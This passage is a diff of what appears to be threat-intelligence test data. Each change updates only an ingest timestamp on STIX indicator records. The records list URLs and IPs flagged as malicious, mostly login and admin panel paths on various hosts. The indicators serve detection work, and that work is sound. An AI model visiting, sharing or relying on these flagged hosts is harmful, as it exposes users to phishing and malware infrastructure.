@@ -14449,7 +14449,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024233500Z", + "ingested": "2021-12-14T14:57:43.118287155Z", "original": "{\"created\":\"2020-02-02T01:58:23.948Z\",\"description\":\"TS ID: 55280666593; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4eeed5f1-092b-4a3f-8c54-f5eb87b5a19c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:58:23.948Z\",\"name\":\"mal_url: http://f0393735.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393735.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:23.948Z\"}", "category": "threat", "type": "indicator", @@ -14501,7 +14501,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024237900Z", + "ingested": "2021-12-14T14:57:43.118287551Z", "original": "{\"created\":\"2020-02-02T01:58:44.041Z\",\"description\":\"TS ID: 55280666689; iType: mal_url; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--c253cabd-5a52-4b5f-a53f-94ca58ee3f60\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-02T01:58:44.041Z\",\"name\":\"mal_url: http://gerawest.xyz/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gerawest.xyz/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:44.041Z\"}", "category": "threat", "type": "indicator", 
@@ -14552,7 +14552,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024241400Z", + "ingested": "2021-12-14T14:57:43.118288041Z", "original": "{\"created\":\"2020-02-02T01:58:54.099Z\",\"description\":\"TS ID: 55280666701; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--0bb2320f-9a03-4375-ad2a-10b5d3c41b36\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:58:54.099Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:54.099Z\"}", "category": "threat", "type": "indicator", @@ -14603,7 +14603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024246400Z", + "ingested": "2021-12-14T14:57:43.118288491Z", "original": "{\"created\":\"2020-02-02T01:59:11.446Z\",\"description\":\"TS ID: 55280666697; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--f6198f5d-4056-4b4f-8ab7-d9b82ec4878b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T01:59:11.446Z\",\"name\":\"mal_url: http://j1040794.myjino.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1040794.myjino.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:11.446Z\"}", "category": "threat", "type": "indicator", 
@@ -14654,7 +14654,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024252500Z", + "ingested": "2021-12-14T14:57:43.118288927Z", "original": "{\"created\":\"2020-02-02T01:59:24.665Z\",\"description\":\"TS ID: 55280666589; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--60d7cde7-6852-4295-8399-81b21cc74d7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-02T01:59:24.665Z\",\"name\":\"mal_url: http://f0395171.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395171.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:24.665Z\"}", "category": "threat", "type": "indicator", @@ -14706,7 +14706,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024258800Z", + "ingested": "2021-12-14T14:57:43.118289370Z", "original": "{\"created\":\"2020-02-02T02:00:11.839Z\",\"description\":\"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:11.839Z\",\"name\":\"mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:11.839Z\"}", "category": "threat", "type": "indicator", 
@@ -14758,7 +14758,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024265900Z", + "ingested": "2021-12-14T14:57:43.118289884Z", "original": "{\"created\":\"2020-02-02T02:00:15.667Z\",\"description\":\"TS ID: 55280666662; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--f6bd5b3a-7b17-4b33-a487-1d47f9ffa62b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-02T02:00:15.667Z\",\"name\":\"mal_url: http://nortonlilly.info/boss/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/boss/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:15.667Z\"}", "category": "threat", "type": "indicator", @@ -14809,7 +14809,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024273Z", + "ingested": "2021-12-14T14:57:43.118290296Z", "original": "{\"created\":\"2020-02-02T02:00:31.866Z\",\"description\":\"TS ID: 55280666667; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bc1481fa-a858-4a87-9ef6-8844ace2dbed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T02:00:31.866Z\",\"name\":\"mal_url: http://ildar-mael-ru.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ildar-mael-ru.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.866Z\"}", "category": "threat", "type": "indicator", 
@@ -14861,7 +14861,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024280100Z", + "ingested": "2021-12-14T14:57:43.118290685Z", "original": "{\"created\":\"2020-02-02T02:00:31.895Z\",\"description\":\"TS ID: 55280666659; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e441cd63-5660-465f-a299-b035d8276ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-02T02:00:31.895Z\",\"name\":\"mal_url: http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.895Z\"}", "category": "threat", "type": "indicator", @@ -14906,7 +14906,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024287100Z", + "ingested": "2021-12-14T14:57:43.118291158Z", "original": "{\"created\":\"2020-02-02T02:00:38.587Z\",\"description\":\"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--f83c3853-4de3-4139-8076-a598265f453c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-02T02:00:38.587Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.587Z\"}", "category": "threat", "type": "indicator", 
@@ -14957,7 +14957,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024294100Z", + "ingested": "2021-12-14T14:57:43.118291603Z", "original": "{\"created\":\"2020-02-02T02:00:38.657Z\",\"description\":\"TS ID: 55280666595; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--374e400c-0db7-4e0d-b533-5b6653178da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T02:00:38.657Z\",\"name\":\"mal_url: http://f0393257.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393257.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.657Z\"}", "category": "threat", "type": "indicator", @@ -15009,7 +15009,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024301Z", + "ingested": "2021-12-14T14:57:43.118292044Z", "original": "{\"created\":\"2020-02-02T02:00:44.275Z\",\"description\":\"TS ID: 55280666609; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--6a115b32-72cb-4397-9550-28bd809ff522\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:44.275Z\",\"name\":\"mal_url: http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:44.275Z\"}", "category": "threat", "type": "indicator", 
@@ -15054,7 +15054,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024308200Z", + "ingested": "2021-12-14T14:57:43.118292492Z", "original": "{\"created\":\"2020-02-02T02:01:03.981Z\",\"description\":\"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-02T02:01:03.981Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:03.981Z\"}", "category": "threat", "type": "indicator", @@ -15099,7 +15099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024315100Z", + "ingested": "2021-12-14T14:57:43.118292988Z", "original": "{\"created\":\"2020-02-02T02:01:09.238Z\",\"description\":\"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:01:09.238Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:09.238Z\"}", "category": "threat", "type": "indicator", 
@@ -15144,7 +15144,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024322Z", + "ingested": "2021-12-14T14:57:43.118293386Z", "original": "{\"created\":\"2020-02-03T01:56:22.888Z\",\"description\":\"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:56:22.888Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:22.888Z\"}", "category": "threat", "type": "indicator", @@ -15195,7 +15195,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024329Z", + "ingested": "2021-12-14T14:57:43.118293778Z", "original": "{\"created\":\"2020-02-03T01:56:30.815Z\",\"description\":\"TS ID: 55283402093; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--16fe8840-e1d7-4e71-acd8-d727ed7baa09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:56:30.815Z\",\"name\":\"mal_url: http://mine.kommanditgesel.icu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mine.kommanditgesel.icu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:30.815Z\"}", "category": "threat", "type": "indicator", 
@@ -15247,7 +15247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024336Z", + "ingested": "2021-12-14T14:57:43.118294293Z", "original": "{\"created\":\"2020-02-03T01:56:31.691Z\",\"description\":\"TS ID: 55283402090; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--c091ca15-bd83-4318-b0f0-1c322baa7a7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:31.691Z\",\"name\":\"mal_url: http://soapstampingmachines.com/slider/data1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://soapstampingmachines.com/slider/data1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:31.691Z\"}", "category": "threat", "type": "indicator", @@ -15298,7 +15298,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024340Z", + "ingested": "2021-12-14T14:57:43.118294739Z", "original": "{\"created\":\"2020-02-03T01:56:34.945Z\",\"description\":\"TS ID: 55283402094; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d68559f0-f20c-40bb-ab62-c2f80c83c80f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:34.945Z\",\"name\":\"mal_url: http://jino-stell-jino.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jino-stell-jino.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:34.945Z\"}", "category": "threat", "type": "indicator", 
@@ -15350,7 +15350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024343400Z", + "ingested": "2021-12-14T14:57:43.118295126Z", "original": "{\"created\":\"2020-02-03T01:57:32.61Z\",\"description\":\"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:57:32.61Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:32.61Z\"}", "category": "threat", "type": "indicator", @@ -15395,7 +15395,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024348300Z", + "ingested": "2021-12-14T14:57:43.118295516Z", "original": "{\"created\":\"2020-02-03T01:57:46.702Z\",\"description\":\"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-03T01:57:46.702Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:46.702Z\"}", "category": "threat", "type": "indicator", 
@@ -15447,7 +15447,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024353600Z", + "ingested": "2021-12-14T14:57:43.118296032Z", "original": "{\"created\":\"2020-02-03T01:58:15.744Z\",\"description\":\"TS ID: 55283402101; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--336d902d-e5d8-48c1-87be-c4f506274d34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-03T01:58:15.744Z\",\"name\":\"mal_url: http://hypercleaner.su/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hypercleaner.su/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:15.744Z\"}", "category": "threat", "type": "indicator", @@ -15499,7 +15499,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024359600Z", + "ingested": "2021-12-14T14:57:43.118296513Z", "original": "{\"created\":\"2020-02-03T01:58:28.73Z\",\"description\":\"TS ID: 55283402095; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-03T01:58:28.73Z\",\"name\":\"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnny.kommanditgesel.icu/news/plast/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:28.73Z\"}", "category": "threat", "type": "indicator", 
@@ -15551,7 +15551,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024363400Z", + "ingested": "2021-12-14T14:57:43.118296916Z", "original": "{\"created\":\"2020-02-03T01:59:18.132Z\",\"description\":\"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime\",\"id\":\"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-03T01:59:18.132Z\",\"name\":\"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pa-buol.go.id/wp/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:18.132Z\"}", "category": "threat", "type": "indicator", @@ -15603,7 +15603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024368600Z", + "ingested": "2021-12-14T14:57:43.118297373Z", "original": "{\"created\":\"2020-02-03T01:59:28.343Z\",\"description\":\"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-03T01:59:28.343Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:28.343Z\"}", "category": "threat", "type": "indicator", 
@@ -15655,7 +15655,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024373300Z", + "ingested": "2021-12-14T14:57:43.118297894Z", "original": "{\"created\":\"2020-02-03T01:59:33.587Z\",\"description\":\"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-03T01:59:33.587Z\",\"name\":\"mal_url: http://anorelier.hk/fshblfn8071/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:33.587Z\"}", "category": "threat", "type": "indicator", @@ -15707,7 +15707,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024377500Z", + "ingested": "2021-12-14T14:57:43.118298289Z", "original": "{\"created\":\"2020-02-03T01:59:54.52Z\",\"description\":\"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f33dd90a-b849-42af-9bcb-f60476358305\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-03T01:59:54.52Z\",\"name\":\"mal_url: http://bendetta.online/mangooste/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bendetta.online/mangooste/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.52Z\"}", "category": "threat", "type": "indicator", 
@@ -15759,7 +15759,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024385200Z", + "ingested": "2021-12-14T14:57:43.118298805Z", "original": "{\"created\":\"2020-02-03T01:59:54.544Z\",\"description\":\"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--27f2f598-95d6-4e35-a42e-240093d4452d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:59:54.544Z\",\"name\":\"mal_url: http://kayfundz.ru/kay/eng/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.544Z\"}", "category": "threat", "type": "indicator", @@ -15811,7 +15811,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024391Z", + "ingested": "2021-12-14T14:57:43.118299356Z", "original": "{\"created\":\"2020-02-05T01:58:09.73Z\",\"description\":\"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--65a8989b-25c3-498e-8247-0514d5aa719e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-05T01:58:09.73Z\",\"name\":\"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:09.73Z\"}", "category": "threat", "type": "indicator", 
@@ -15863,7 +15863,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024398500Z", + "ingested": "2021-12-14T14:57:43.118299794Z", "original": "{\"created\":\"2020-02-05T01:58:17.365Z\",\"description\":\"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-05T01:58:17.365Z\",\"name\":\"mal_url: http://89.160.20.156/hoist3/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/hoist3/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.365Z\"}", "category": "threat", "type": "indicator", @@ -15908,7 +15908,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024405700Z", + "ingested": "2021-12-14T14:57:43.118300242Z", "original": "{\"created\":\"2020-02-05T01:58:17.428Z\",\"description\":\"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--7aed3145-aab6-470d-bb4f-592d86654719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-02-05T01:58:17.428Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.428Z\"}", "category": "threat", "type": "indicator", 
@@ -15960,7 +15960,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024411500Z", + "ingested": "2021-12-14T14:57:43.118300728Z", "original": "{\"created\":\"2020-02-05T01:58:31.683Z\",\"description\":\"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T01:58:31.683Z\",\"name\":\"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.683Z\"}", "category": "threat", "type": "indicator", @@ -16012,7 +16012,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024418600Z", + "ingested": "2021-12-14T14:57:43.118301166Z", "original": "{\"created\":\"2020-02-05T01:58:31.704Z\",\"description\":\"TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--59c28566-62b0-4102-ad17-53ec3a143144\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-05T01:58:31.704Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.704Z\"}", "category": "threat", "type": "indicator", 
@@ -16064,7 +16064,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024425500Z", + "ingested": "2021-12-14T14:57:43.118301556Z", "original": "{\"created\":\"2020-02-05T01:58:32.111Z\",\"description\":\"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:32.111Z\",\"name\":\"mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.111Z\"}", "category": "threat", "type": "indicator", @@ -16116,7 +16116,7 @@ } }, "event": { - "ingested": 